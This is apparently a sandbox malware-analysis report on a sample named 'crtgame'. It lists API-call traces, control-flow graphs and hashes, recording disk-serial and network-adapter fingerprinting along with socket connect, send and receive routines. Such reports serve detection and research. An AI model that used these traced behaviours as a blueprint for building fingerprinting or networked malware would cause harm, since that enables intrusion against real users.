                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: 262ea38c863b12a4ae72503f1e2e8b9d77e61f64a4470d9ccc950f5716a054fe
                                                                          • Instruction ID: fdd82ba0fa57248a6ceec9053b8f94b4c5ebe53c397e783ebb603765a25c44f8
                                                                          • Opcode Fuzzy Hash: 262ea38c863b12a4ae72503f1e2e8b9d77e61f64a4470d9ccc950f5716a054fe
                                                                          • Instruction Fuzzy Hash: 43319EB1904705EFD710DF25C884B56BBE8FB48764F104AAEF85987A81EB70E914CFA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 02BCF29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02BCF2BB
                                                                            • Part of subcall function 02BCF29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02BCF2F9
                                                                            • Part of subcall function 02BCF29C: GetLastError.KERNEL32 ref: 02BCF35A
                                                                            • Part of subcall function 02BCF29C: CloseHandle.KERNELBASE(?), ref: 02BCF391
                                                                            • Part of subcall function 02BCF3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02BCF3B6
                                                                            • Part of subcall function 02BCF3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF3CF
                                                                            • Part of subcall function 02BCF3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02BCF3F4
                                                                            • Part of subcall function 02BCF3A0: FreeLibrary.KERNEL32(00000000), ref: 02BCF47D
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02BCF235
                                                                          • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02BCF256
                                                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02BCF26A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BCF273
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                          • String ID: tLVh
                                                                          • API String ID: 1378705229-319918027
                                                                          • Opcode ID: 43e2410ba67e004218d0d169fa05df35a6a609e130acca3181eca3c78123ce83
                                                                          • Instruction ID: 5bc53ae956bf314f252136f3785123792d38d43040ede923276c87e2e5152e00
                                                                          • Opcode Fuzzy Hash: 43e2410ba67e004218d0d169fa05df35a6a609e130acca3181eca3c78123ce83
                                                                          • Instruction Fuzzy Hash: E5116375D00328ABDB10DBA5DC48EEEBB7EEB49750F10069AF505AB184DB705A49CB90

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 601 2bc29ee-2bc2a06 602 2bc2a0c-2bc2a10 601->602 603 2bc2ab3-2bc2abb call 2bd0510 601->603 605 2bc2a39-2bc2a4c WSASetLastError closesocket call 2bc9e92 602->605 606 2bc2a12-2bc2a15 602->606 611 2bc2abe-2bc2ac6 603->611 612 2bc2a51-2bc2a55 605->612 606->605 607 2bc2a17-2bc2a36 call 2bd0510 call 2bc2f50 606->607 607->605 612->603 614 2bc2a57-2bc2a5f call 2bd0510 612->614 619 2bc2a69-2bc2a71 call 2bd0510 614->619 620 2bc2a61-2bc2a67 614->620 626 2bc2aaf-2bc2ab1 619->626 627 2bc2a73-2bc2a79 619->627 620->619 621 2bc2a7b-2bc2aad ioctlsocket WSASetLastError closesocket call 2bc9e92 620->621 621->626 626->603 626->611 627->621 627->626
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02BC2A3B
                                                                          • closesocket.WS2_32(?), ref: 02BC2A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02BC2A89
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02BC2A97
                                                                          • closesocket.WS2_32(?), ref: 02BC2A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: 00bc60be115ac93a63e5a37074c48ef999d16425e17e1d2258e1fc837d58864a
                                                                          • Instruction ID: 3c89cf4267418a3a6690ae5e8c0374081831d5f51036ec607defef925cbc2eed
                                                                          • Opcode Fuzzy Hash: 00bc60be115ac93a63e5a37074c48ef999d16425e17e1d2258e1fc837d58864a
                                                                          • Instruction Fuzzy Hash: F121B875E00205ABEB20ABB8894476EB7E9DF44315F2149EDF855C7241FB7089418B61

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 628 2bc1ba7-2bc1bcf call 2be4df0 RtlEnterCriticalSection 631 2bc1be9-2bc1bf7 RtlLeaveCriticalSection call 2bcdcbc 628->631 632 2bc1bd1 628->632 635 2bc1bfa-2bc1c20 RtlEnterCriticalSection 631->635 633 2bc1bd4-2bc1be0 call 2bc1b79 632->633 640 2bc1c55-2bc1c6e RtlLeaveCriticalSection 633->640 641 2bc1be2-2bc1be7 633->641 637 2bc1c34-2bc1c36 635->637 638 2bc1c38-2bc1c43 637->638 639 2bc1c22-2bc1c2f call 2bc1b79 637->639 642 2bc1c45-2bc1c4b 638->642 639->642 646 2bc1c31 639->646 641->631 641->633 642->640 644 2bc1c4d-2bc1c51 642->644 644->640 646->637
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: ae8de9fd929d0427be2d1f10662159e9d80ff5dcd49eebaf035ec61638bf5c79
                                                                          • Instruction ID: 577f2008fbfa66ba010584e2632c30410eb31e33a0d04971255a184ad6afdd8b
                                                                          • Opcode Fuzzy Hash: ae8de9fd929d0427be2d1f10662159e9d80ff5dcd49eebaf035ec61638bf5c79
                                                                          • Instruction Fuzzy Hash: 28218B75A10204EFDB15CF68C4447AABBB5FF48724F20858DE819AB302DB74E905DBE0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02BC358B,?,?,?,?,?,?,?,02BC8FA9,?), ref: 02BC2EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02BC2EFD
                                                                          • WSAGetLastError.WS2_32(?,02BC358B,?,?,?,?,?,?,?,02BC8FA9,?,?,?,00000001,00000006,?), ref: 02BC2F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02BC2F36
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: 2dc5e125baa6740694261efcfd5a1cfc7b510410c15cecf6585b1a57d07b8a3d
                                                                          • Instruction ID: 7b70dd4b0d803898c3907132834c30f75cd7d2e690c62492a369817e5a7f6569
                                                                          • Opcode Fuzzy Hash: 2dc5e125baa6740694261efcfd5a1cfc7b510410c15cecf6585b1a57d07b8a3d
                                                                          • Instruction Fuzzy Hash: 95014D71940304FBDF205F65DC88B9ABBA9DF85771F008995F914DB151D77089009BA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 657 2bc2db5-2bc2dc8 658 2bc2dca-2bc2dd2 call 2bd0510 657->658 659 2bc2de4-2bc2de8 657->659 668 2bc2dd8 658->668 661 2bc2dfc-2bc2e07 call 2bc2d39 659->661 662 2bc2dea-2bc2ded 659->662 667 2bc2e0c-2bc2e11 661->667 662->661 665 2bc2def-2bc2dfa call 2bd0510 662->665 665->668 670 2bc2ddd-2bc2de3 667->670 671 2bc2e13 667->671 672 2bc2ddb 668->672 673 2bc2e16-2bc2e18 671->673 672->670 673->672 674 2bc2e1a-2bc2e35 call 2bd0510 call 2bc166f 673->674 679 2bc2e54-2bc2e97 WSASetLastError select call 2bc9e92 674->679 680 2bc2e37-2bc2e52 call 2bd0510 call 2bc166f 674->680 685 2bc2e99-2bc2ea4 call 2bd0510 679->685 686 2bc2ea6 679->686 680->672 680->679 694 2bc2ebe-2bc2ed2 call 2bc2d39 685->694 690 2bc2ea8-2bc2eb3 call 2bd0510 686->690 691 2bc2eb6-2bc2eb8 686->691 690->691 691->672 691->694 694->673 698 2bc2ed8 694->698 698->670
                                                                          APIs
                                                                            • Part of subcall function 02BC2D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02BC3390,00000001,?,00000000,?,?,?,?,?), ref: 02BC2D47
                                                                            • Part of subcall function 02BC2D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02BC2D5C
                                                                          • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02BC2E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02BC2E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3'
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 7dc23ddb5902c63277ad4562c3e6d25f95aa82f1970678c77e6564c7cbaedc1a
                                                                          • Instruction ID: 79be9eeab886f1cad7e68b127bb38825e3e4c2b7ccc3fad308a279c891a68ddd
                                                                          • Opcode Fuzzy Hash: 7dc23ddb5902c63277ad4562c3e6d25f95aa82f1970678c77e6564c7cbaedc1a
                                                                          • Instruction Fuzzy Hash: 1B31BEB0E1020AAFDF10EF64C8547EEBBAAEF15358F2049DEDC0497241EBB095518FA1

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?), ref: 02BC2AEA
                                                                          • connect.WS2_32(00000010,?,?), ref: 02BC2AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3'
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: 9d08e0b79a97ca70bcd09b60e61121a805b88e8a17a8b2b0572b59af2e0518fb
                                                                          • Instruction ID: bb28cb34c3969284a1373eeca1e63d88bc9c5c9a42cbde6a3d95fc1aa4d21f6f
                                                                          • Opcode Fuzzy Hash: 9d08e0b79a97ca70bcd09b60e61121a805b88e8a17a8b2b0572b59af2e0518fb
                                                                          • Instruction Fuzzy Hash: A321A771E00208ABDF14BFB4C4546EEBBBAEF44324F2085DDDC1897281EBB44A018FA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 730 2bc353e-2bc3555 call 2be4df0 733 2bc3576-2bc359c call 2bc2edd 730->733 734 2bc3557-2bc3571 call 2bc1996 730->734 740 2bc35ad-2bc35c3 CreateIoCompletionPort 733->740 741 2bc359e-2bc35a8 733->741 739 2bc3688-2bc3697 734->739 743 2bc35db-2bc35e2 call 2bd0510 740->743 744 2bc35c5-2bc35d9 GetLastError call 2bd0510 740->744 742 2bc3684 741->742 745 2bc3687 742->745 750 2bc35e4-2bc35ed 743->750 744->750 745->739 751 2bc35ef-2bc3624 call 2bd0510 call 2bc29ee 750->751 752 2bc3626-2bc3630 750->752 751->745 753 2bc3640 752->753 754 2bc3632-2bc3633 752->754 758 2bc3644-2bc366a call 2bcd87f 753->758 756 2bc363a-2bc363e 754->756 757 2bc3635-2bc3638 754->757 756->758 757->758 764 2bc366c call 2bc143f 758->764 765 2bc3671-2bc3681 call 2bd0510 758->765 764->765 765->742
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 43f933efab0f934e5d31a19549ff00aec76cdb70d56fd075dac357bd0e1c97ec
                                                                          • Instruction ID: a255c463a5d222d5b1246b6bde48af29cd5440e617bd7ed7754bfc048d0d640b
                                                                          • Opcode Fuzzy Hash: 43f933efab0f934e5d31a19549ff00aec76cdb70d56fd075dac357bd0e1c97ec
                                                                          • Instruction Fuzzy Hash: 39511DB1904216DFCB05DF58D5406AABBF1FF08324F24C5AEE8699B381D7749911CFA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 769 2bc369a-2bc36b1 InterlockedIncrement 770 2bc36b9-2bc36c1 769->770 771 2bc36b3-2bc36b7 769->771 773 2bc36cc-2bc36fc WSARecv WSAGetLastError 770->773 774 2bc36c3-2bc36ca 770->774 772 2bc3722-2bc372d call 2bc247d 771->772 782 2bc373a-2bc373c 772->782 775 2bc36fe-2bc3703 773->775 776 2bc3705-2bc370f 773->776 774->772 778 2bc3712-2bc3715 775->778 776->778 780 2bc372f-2bc3735 call 2bc2420 778->780 781 2bc3717-2bc371c 778->781 780->782 781->780 783 2bc371e-2bc3721 781->783 783->772
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02BC36A7
                                                                            • Part of subcall function 02BC2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02BC2432
                                                                            • Part of subcall function 02BC2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC2445
                                                                            • Part of subcall function 02BC2420: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2454
                                                                            • Part of subcall function 02BC2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2469
                                                                            • Part of subcall function 02BC2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: d23c053c92527091a12a857d40ebe52f32cf79756355093a78f13a6297377e1f
                                                                          • Instruction ID: 680bd115d697a3b1866a29922c50e7cd236f156eea9a8b32ff7fd65862e773d9
                                                                          • Opcode Fuzzy Hash: d23c053c92527091a12a857d40ebe52f32cf79756355093a78f13a6297377e1f
                                                                          • Instruction Fuzzy Hash: 9311C4B5104208EBDF219E14DC85FAA3BA5EF00355F6085AAFE568A290CB35D860DB94
                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 02BD1B06
                                                                          • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02BCA5DA,00000000), ref: 02BD1B37
                                                                          • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02BCA5DA,00000000), ref: 02BD1B45
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          • Opcode ID: cf851f92acfb00da991cdf9877e7a351c00e5fc0044dede305899e73fd295121
                                                                          • Instruction ID: 9ac32b76092e80e528404344cb02207e6703d55b9d0064b975e2dc484bf17a80
                                                                          • Opcode Fuzzy Hash: cf851f92acfb00da991cdf9877e7a351c00e5fc0044dede305899e73fd295121
                                                                          • Instruction Fuzzy Hash: 02F0F670350200ABEB209F6CDC80FD1B3E8EF49324F2405AAF648C7280E771E8929B90
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(02BF7524), ref: 02BC1ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02BC1ACB
                                                                          • InterlockedExchange.KERNEL32(02BF7528,00000000), ref: 02BC1AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          • Opcode ID: 46ac675d13a8ad676d8d81a9b9e6a47f531105e1986d909f8bc174871b7b2f0a
                                                                          • Instruction ID: e16730f5fad8d40f78422ccf877f3964969f75753bef11ee82d1d33c95f7526d
                                                                          • Opcode Fuzzy Hash: 46ac675d13a8ad676d8d81a9b9e6a47f531105e1986d909f8bc174871b7b2f0a
                                                                          • Instruction Fuzzy Hash: EDD02E70C80204ABF61077A4AC0EA38F36CEB00621F0006C0FE3AC60C2EE10A924E1A7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4B1D
                                                                            • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                            • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                            • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                            • Part of subcall function 02BCDA84: __EH_prolog.LIBCMT ref: 02BCDA89
                                                                            • Part of subcall function 02BCDA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BCDB08
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4C1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          • Opcode ID: 2fe30e00f3eed10f0f67426a9285d768b07bfcd99e1f9baa53aa7ddbc51a245a
                                                                          • Instruction ID: 067a145b2e61cd5ef740c78bb90a77d4187c3cd0dacc1099ccb20d8a47c9b2a6
                                                                          • Opcode Fuzzy Hash: 2fe30e00f3eed10f0f67426a9285d768b07bfcd99e1f9baa53aa7ddbc51a245a
                                                                          • Instruction Fuzzy Hash: F0512871D04248DFDB15DFA8C494AEEBBB5EF08314F2481AEE915AB251DB709A44CF60
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02BC3390,00000001,?,00000000,?,?,?,?,?), ref: 02BC2D47
                                                                          • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02BC2D5C
                                                                            • Part of subcall function 02BC9E92: WSAGetLastError.WS2_32(?,00000080,00000017,02BC3114), ref: 02BC9EA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          • Opcode ID: 92ca54174f5ed87810eb1effd0a92ef8ca4585634363b4ef9ee7f793208554b3
                                                                          • Instruction ID: 4bd45604b875e99adb764785b04654eede642ee108d1a050702d95b15f3e0194
                                                                          • Opcode Fuzzy Hash: 92ca54174f5ed87810eb1effd0a92ef8ca4585634363b4ef9ee7f793208554b3
                                                                          • Instruction Fuzzy Hash: 1C0188B5500209EFD7206F54C88486FBBEDFF55364B2009AEFC5987200EB709D008BA1
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,00000000,?,02BC752F,?,02BF74D8,02BF74D8,?,?,02BF74D8,00000000,000007E7), ref: 02BC7D90
                                                                          • shutdown.WS2_32(00000000,00000002), ref: 02BC7D99
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          • Opcode ID: 78ca185ed8eddf281e2407c8e8c3899bce198b02d30e67da251d43e4a43bce69
                                                                          • Instruction ID: ce30497654d30f1c6643e62b768fa857639d63fc6a2a3dfda00532027cbcd4dd
                                                                          • Opcode Fuzzy Hash: 78ca185ed8eddf281e2407c8e8c3899bce198b02d30e67da251d43e4a43bce69
                                                                          • Instruction Fuzzy Hash: 62F06D71A003159FCB10AF68D410BAAB7E9EF49320F21499DED9597380EB70A8008FA1
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC5049
                                                                            • Part of subcall function 02BC3D7E: htons.WS2_32(?), ref: 02BC3DA2
                                                                            • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                            • Part of subcall function 02BC3D7E: htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          • Opcode ID: 945e4fa6c24f4fe96559a03c75de314031e860ca4b8ec911b44f446f80d70e3e
                                                                          • Instruction ID: 461504a03023f2bb43756d1e7427f9ea185e6ea61852f31da5bd5d86c9bd3f90
                                                                          • Opcode Fuzzy Hash: 945e4fa6c24f4fe96559a03c75de314031e860ca4b8ec911b44f446f80d70e3e
                                                                          • Instruction Fuzzy Hash: F28126B1D0024E8ECF15DFA8D580AEEBBB5EF48314F20819ED855B7240EB756A45CFA1
                                                                          APIs
                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02C43C08
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BFA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BFA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bfa000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPathSpecial
                                                                          • String ID:
                                                                          • API String ID: 994120019-0
                                                                          • Opcode ID: 5c9eab3d12dee64b864ae3622609c2100aa913efd499afcd992912cc0bb11a50
                                                                          • Instruction ID: 102eaae84b65427e5dd10e81d4618dbc35d964019b56d74eba55f8ef5fcdbb45
                                                                          • Opcode Fuzzy Hash: 5c9eab3d12dee64b864ae3622609c2100aa913efd499afcd992912cc0bb11a50
                                                                          • Instruction Fuzzy Hash: 7A21A1F260C604AFE7057A09EC46BBABBE4EB84720F06893EE7C447750EA31584186D7
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCE352
                                                                            • Part of subcall function 02BC1A01: TlsGetValue.KERNEL32 ref: 02BC1A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          • Opcode ID: bd1fce4ca62367b2166d4a1c9a58bb9586372c9a81f20cfc3db366d8ffe0ec10
                                                                          • Instruction ID: 676e292326649751479f0d928611ae14ad44595b5b5a8eccdefb7bd6f3eef35c
                                                                          • Opcode Fuzzy Hash: bd1fce4ca62367b2166d4a1c9a58bb9586372c9a81f20cfc3db366d8ffe0ec10
                                                                          • Instruction Fuzzy Hash: A3214FB1904209EFDB04DF94D440AEEBBF9EF48310F20816EE515A3240D770EA00CBA1
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC33CC
                                                                            • Part of subcall function 02BC32AB: __EH_prolog.LIBCMT ref: 02BC32B0
                                                                            • Part of subcall function 02BC32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC32C3
                                                                            • Part of subcall function 02BC32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC32EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          • Opcode ID: 0db0f418028fb1bd427560a606c03371dcb0ec6c994141c7edc1c0c93e292a40
                                                                          • Instruction ID: 8a6f6c5d4c539d4967a9179bb3f20778ed4367ff24d054e1afc911054121ed95
                                                                          • Opcode Fuzzy Hash: 0db0f418028fb1bd427560a606c03371dcb0ec6c994141c7edc1c0c93e292a40
                                                                          • Instruction Fuzzy Hash: 79019670214606AFDB04CF59D885F55F7A9FF44320B64C39DE828872C0EB70E811CBA0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BCDEE2
                                                                            • Part of subcall function 02BC26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                            • Part of subcall function 02BC26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                            • Part of subcall function 02BC26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5553), ref: 02BC2738
                                                                            • Part of subcall function 02BC26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
                                                                            • Part of subcall function 02BC26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02BC27D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
